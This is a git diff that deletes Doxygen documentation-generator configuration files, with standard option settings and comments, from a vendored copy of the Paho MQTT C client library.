-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `xml' will be used as the default path.
-
-XML_OUTPUT             = xml
-
-# The XML_SCHEMA tag can be used to specify an XML schema,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_SCHEMA             =
-
-# The XML_DTD tag can be used to specify an XML DTD,
-# which can be used by a validating XML parser to check the
-# syntax of the XML files.
-
-XML_DTD                =
-
-# If the XML_PROGRAMLISTING tag is set to YES Doxygen will
-# dump the program listings (including syntax highlighting
-# and cross-referencing information) to the XML output. Note that
-# enabling this will significantly increase the size of the XML output.
-
-XML_PROGRAMLISTING     = YES
-
-#---------------------------------------------------------------------------
-# configuration options for the AutoGen Definitions output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_AUTOGEN_DEF tag is set to YES Doxygen will
-# generate an AutoGen Definitions (see autogen.sf.net) file
-# that captures the structure of the code including all
-# documentation. Note that this feature is still experimental
-# and incomplete at the moment.
-
-GENERATE_AUTOGEN_DEF   = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the Perl module output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_PERLMOD tag is set to YES Doxygen will
-# generate a Perl module file that captures the structure of
-# the code including all documentation. Note that this
-# feature is still experimental and incomplete at the
-# moment.
-
-GENERATE_PERLMOD       = NO
-
-# If the PERLMOD_LATEX tag is set to YES Doxygen will generate
-# the necessary Makefile rules, Perl scripts and LaTeX code to be able
-# to generate PDF and DVI output from the Perl module output.
-
-PERLMOD_LATEX          = NO
-
-# If the PERLMOD_PRETTY tag is set to YES the Perl module output will be
-# nicely formatted so it can be parsed by a human reader.
-# This is useful
-# if you want to understand what is going on.
-# On the other hand, if this
-# tag is set to NO the size of the Perl module output will be much smaller
-# and Perl will parse it just the same.
-
-PERLMOD_PRETTY         = YES
-
-# The names of the make variables in the generated doxyrules.make file
-# are prefixed with the string contained in PERLMOD_MAKEVAR_PREFIX.
-# This is useful so different doxyrules.make files included by the same
-# Makefile don't overwrite each other's variables.
-
-PERLMOD_MAKEVAR_PREFIX =
-
-#---------------------------------------------------------------------------
-# Configuration options related to the preprocessor
-#---------------------------------------------------------------------------
-
-# If the ENABLE_PREPROCESSING tag is set to YES (the default) Doxygen will
-# evaluate all C-preprocessor directives found in the sources and include
-# files.
-
-ENABLE_PREPROCESSING   = YES
-
-# If the MACRO_EXPANSION tag is set to YES Doxygen will expand all macro
-# names in the source code. If set to NO (the default) only conditional
-# compilation will be performed. Macro expansion can be done in a controlled
-# way by setting EXPAND_ONLY_PREDEF to YES.
-
-MACRO_EXPANSION        = YES
-
-# If the EXPAND_ONLY_PREDEF and MACRO_EXPANSION tags are both set to YES
-# then the macro expansion is limited to the macros specified with the
-# PREDEFINED and EXPAND_AS_DEFINED tags.
-
-EXPAND_ONLY_PREDEF     = NO
-
-# If the SEARCH_INCLUDES tag is set to YES (the default) the includes files
-# pointed to by INCLUDE_PATH will be searched when a #include is found.
-
-SEARCH_INCLUDES        = YES
-
-# The INCLUDE_PATH tag can be used to specify one or more directories that
-# contain include files that are not input files but should be processed by
-# the preprocessor.
-
-INCLUDE_PATH           =
-
-# You can use the INCLUDE_FILE_PATTERNS tag to specify one or more wildcard
-# patterns (like *.h and *.hpp) to filter out the header-files in the
-# directories. If left blank, the patterns specified with FILE_PATTERNS will
-# be used.
-
-INCLUDE_FILE_PATTERNS  =
-
-# The PREDEFINED tag can be used to specify one or more macro names that
-# are defined before the preprocessor is started (similar to the -D option of
-# gcc). The argument of the tag is a list of macros of the form: name
-# or name=definition (no spaces). If the definition and the = are
-# omitted =1 is assumed. To prevent a macro definition from being
-# undefined via #undef or recursively expanded use the := operator
-# instead of the = operator.
-
-PREDEFINED             = __attribute__(x)=
-
-# If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then
-# this tag can be used to specify a list of macro names that should be expanded.
-# The macro definition that is found in the sources will be used.
-# Use the PREDEFINED tag if you want to use a different macro definition that
-# overrules the definition found in the source code.
-
-EXPAND_AS_DEFINED      =
-
-# If the SKIP_FUNCTION_MACROS tag is set to YES (the default) then
-# doxygen's preprocessor will remove all references to function-like macros
-# that are alone on a line, have an all uppercase name, and do not end with a
-# semicolon, because these will confuse the parser if not removed.
-
-SKIP_FUNCTION_MACROS   = YES
-
-#---------------------------------------------------------------------------
-# Configuration::additions related to external references
-#---------------------------------------------------------------------------
-
-# The TAGFILES option can be used to specify one or more tagfiles. For each
-# tag file the location of the external documentation should be added. The
-# format of a tag file without this location is as follows:
-#
-# TAGFILES = file1 file2 ...
-# Adding location for the tag files is done as follows:
-#
-# TAGFILES = file1=loc1 "file2 = loc2" ...
-# where "loc1" and "loc2" can be relative or absolute paths
-# or URLs. Note that each tag file must have a unique name (where the name does
-# NOT include the path). If a tag file is not located in the directory in which
-# doxygen is run, you must also specify the path to the tagfile here.
-
-TAGFILES               =
-
-# When a file name is specified after GENERATE_TAGFILE, doxygen will create
-# a tag file that is based on the input files it reads.
-
-GENERATE_TAGFILE       =
-
-# If the ALLEXTERNALS tag is set to YES all external classes will be listed
-# in the class index. If set to NO only the inherited external classes
-# will be listed.
-
-ALLEXTERNALS           = NO
-
-# If the EXTERNAL_GROUPS tag is set to YES all external groups will be listed
-# in the modules index. If set to NO, only the current project's groups will
-# be listed.
-
-EXTERNAL_GROUPS        = YES
-
-# The PERL_PATH should be the absolute path and name of the perl script
-# interpreter (i.e. the result of `which perl').
-
-PERL_PATH              = /usr/bin/perl
-
-#---------------------------------------------------------------------------
-# Configuration options related to the dot tool
-#---------------------------------------------------------------------------
-
-# If the CLASS_DIAGRAMS tag is set to YES (the default) Doxygen will
-# generate a inheritance diagram (in HTML, RTF and LaTeX) for classes with base
-# or super classes. Setting the tag to NO turns the diagrams off. Note that
-# this option also works with HAVE_DOT disabled, but it is recommended to
-# install and use dot, since it yields more powerful graphs.
-
-CLASS_DIAGRAMS         = NO
-
-# You can define message sequence charts within doxygen comments using the \msc
-# command. Doxygen will then run the mscgen tool (see
-# http://www.mcternan.me.uk/mscgen/) to produce the chart and insert it in the
-# documentation. The MSCGEN_PATH tag allows you to specify the directory where
-# the mscgen tool resides. If left empty the tool is assumed to be found in the
-# default search path.
-
-MSCGEN_PATH            =
-
-# If set to YES, the inheritance and collaboration graphs will hide
-# inheritance and usage relations if the target is undocumented
-# or is not a class.
-
-HIDE_UNDOC_RELATIONS   = YES
-
-# If you set the HAVE_DOT tag to YES then doxygen will assume the dot tool is
-# available from the path. This tool is part of Graphviz, a graph visualization
-# toolkit from AT&T and Lucent Bell Labs. The other options in this section
-# have no effect if this option is set to NO (the default)
-
-HAVE_DOT               = NO
-
-# The DOT_NUM_THREADS specifies the number of dot invocations doxygen is
-# allowed to run in parallel. When set to 0 (the default) doxygen will
-# base this on the number of processors available in the system. You can set it
-# explicitly to a value larger than 0 to get control over the balance
-# between CPU load and processing speed.
-
-DOT_NUM_THREADS        = 0
-
-# By default doxygen will use the Helvetica font for all dot files that
-# doxygen generates. When you want a differently looking font you can specify
-# the font name using DOT_FONTNAME. You need to make sure dot is able to find
-# the font, which can be done by putting it in a standard location or by setting
-# the DOTFONTPATH environment variable or by setting DOT_FONTPATH to the
-# directory containing the font.
-
-DOT_FONTNAME           = FreeSans
-
-# The DOT_FONTSIZE tag can be used to set the size of the font of dot graphs.
-# The default size is 10pt.
-
-DOT_FONTSIZE           = 10
-
-# By default doxygen will tell dot to use the Helvetica font.
-# If you specify a different font using DOT_FONTNAME you can use DOT_FONTPATH to
-# set the path where dot can find it.
-
-DOT_FONTPATH           =
-
-# If the CLASS_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect inheritance relations. Setting this tag to YES will force the
-# CLASS_DIAGRAMS tag to NO.
-
-CLASS_GRAPH            = YES
-
-# If the COLLABORATION_GRAPH and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for each documented class showing the direct and
-# indirect implementation dependencies (inheritance, containment, and
-# class references variables) of the class with other documented classes.
-
-COLLABORATION_GRAPH    = YES
-
-# If the GROUP_GRAPHS and HAVE_DOT tags are set to YES then doxygen
-# will generate a graph for groups, showing the direct groups dependencies
-
-GROUP_GRAPHS           = YES
-
-# If the UML_LOOK tag is set to YES doxygen will generate inheritance and
-# collaboration diagrams in a style similar to the OMG's Unified Modeling
-# Language.
-
-UML_LOOK               = NO
-
-# If the UML_LOOK tag is enabled, the fields and methods are shown inside
-# the class node. If there are many fields or methods and many nodes the
-# graph may become too big to be useful. The UML_LIMIT_NUM_FIELDS
-# threshold limits the number of items for each type to make the size more
-# managable. Set this to 0 for no limit. Note that the threshold may be
-# exceeded by 50% before the limit is enforced.
-
-UML_LIMIT_NUM_FIELDS   = 10
-
-# If set to YES, the inheritance and collaboration graphs will show the
-# relations between templates and their instances.
-
-TEMPLATE_RELATIONS     = NO
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDE_GRAPH, and HAVE_DOT
-# tags are set to YES then doxygen will generate a graph for each documented
-# file showing the direct and indirect include dependencies of the file with
-# other documented files.
-
-INCLUDE_GRAPH          = YES
-
-# If the ENABLE_PREPROCESSING, SEARCH_INCLUDES, INCLUDED_BY_GRAPH, and
-# HAVE_DOT tags are set to YES then doxygen will generate a graph for each
-# documented header file showing the documented files that directly or
-# indirectly include this file.
-
-INCLUDED_BY_GRAPH      = YES
-
-# If the CALL_GRAPH and HAVE_DOT options are set to YES then
-# doxygen will generate a call dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable call graphs
-# for selected functions only using the \callgraph command.
-
-CALL_GRAPH             = YES
-
-# If the CALLER_GRAPH and HAVE_DOT tags are set to YES then
-# doxygen will generate a caller dependency graph for every global function
-# or class method. Note that enabling this option will significantly increase
-# the time of a run. So in most cases it will be better to enable caller
-# graphs for selected functions only using the \callergraph command.
-
-CALLER_GRAPH           = YES
-
-# If the GRAPHICAL_HIERARCHY and HAVE_DOT tags are set to YES then doxygen
-# will generate a graphical hierarchy of all classes instead of a textual one.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH and HAVE_DOT tags are set to YES
-# then doxygen will show the dependencies a directory has on other directories
-# in a graphical way. The dependency relations are determined by the #include
-# relations between the files in the directories.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot. Possible values are svg, png, jpg, or gif.
-# If left blank png will be used. If you choose svg you need to set
-# HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible in IE 9+ (other browsers do not have this requirement).
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-# Note that this requires a modern browser other than Internet Explorer.
-# Tested and working are Firefox, Chrome, Safari, and Opera. For IE 9+ you
-# need to set HTML_FILE_EXTENSION to xhtml in order to make the SVG files
-# visible. Older versions of IE do not have SVG support.
-
-INTERACTIVE_SVG        = NO
-
-# The tag DOT_PATH can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the
-# \dotfile command).
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the
-# \mscfile command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of
-# nodes that will be shown in the graph. If the number of nodes in a graph
-# becomes larger than this value, doxygen will truncate the graph, which is
-# visualized by representing a node as a red box. Note that doxygen if the
-# number of direct children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note
-# that the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the
-# graphs generated by dot. A depth value of 3 means that only nodes reachable
-# from the root by following a path via at most 3 edges will be shown. Nodes
-# that lay further from the root node will be omitted. Note that setting this
-# option to 1 or 2 may greatly reduce the computation time needed for large
-# code bases. Also note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not
-# seem to support this out of the box. Warning: Depending on the platform used,
-# enabling this option may lead to badly anti-aliased labels on the edges of
-# a graph (i.e. they become hard to read).
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10)
-# support this, this feature is disabled by default.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES (the default) Doxygen will
-# generate a legend page explaining the meaning of the various boxes and
-# arrows in the dot generated graphs.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES (the default) Doxygen will
-# remove the intermediate dot files that are used to generate
-# the various graphs.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in b/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in
deleted file mode 100644
index e2ed5ae..0000000
--- a/thirdparty/paho.mqtt.c/doc/DoxyfileV3AsyncAPI.in
+++ /dev/null
@@ -1,1804 +0,0 @@
-# Doxyfile 1.8.1.2
-
-# This file describes the settings to be used by the documentation system
-# doxygen (www.doxygen.org) for a project.
-#
-# All text after a hash (#) is considered a comment and will be ignored.
-# The format is:
-#       TAG = value [value, ...]
-# For lists items can also be appended using:
-#       TAG += value [value, ...]
-# Values that contain spaces should be placed between quotes (" ").
-
-#---------------------------------------------------------------------------
-# Project related configuration options
-#---------------------------------------------------------------------------
-
-# This tag specifies the encoding used for all characters in the config file
-# that follow. The default is UTF-8 which is also the encoding used for all
-# text before the first occurrence of this tag. Doxygen uses libiconv (or the
-# iconv built into libc) for the transcoding. See
-# http://www.gnu.org/software/libiconv for the list of possible encodings.
-
-DOXYFILE_ENCODING      = UTF-8
-
-# The PROJECT_NAME tag is a single word (or sequence of words) that should
-# identify the project. Note that if you do not use Doxywizard you need
-# to put quotes around the project name if it contains spaces.
-
-PROJECT_NAME           = "Paho Asynchronous MQTT C Client Library"
-
-# The PROJECT_NUMBER tag can be used to enter a project or revision number.
-# This could be handy for archiving the generated documentation or
-# if some version control system is used.
-
-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTAsync/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = /Users/dimitri/doxygen/mail/1.5.7/doxywizard/
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = NO
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = YES
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = NO
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = NO
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
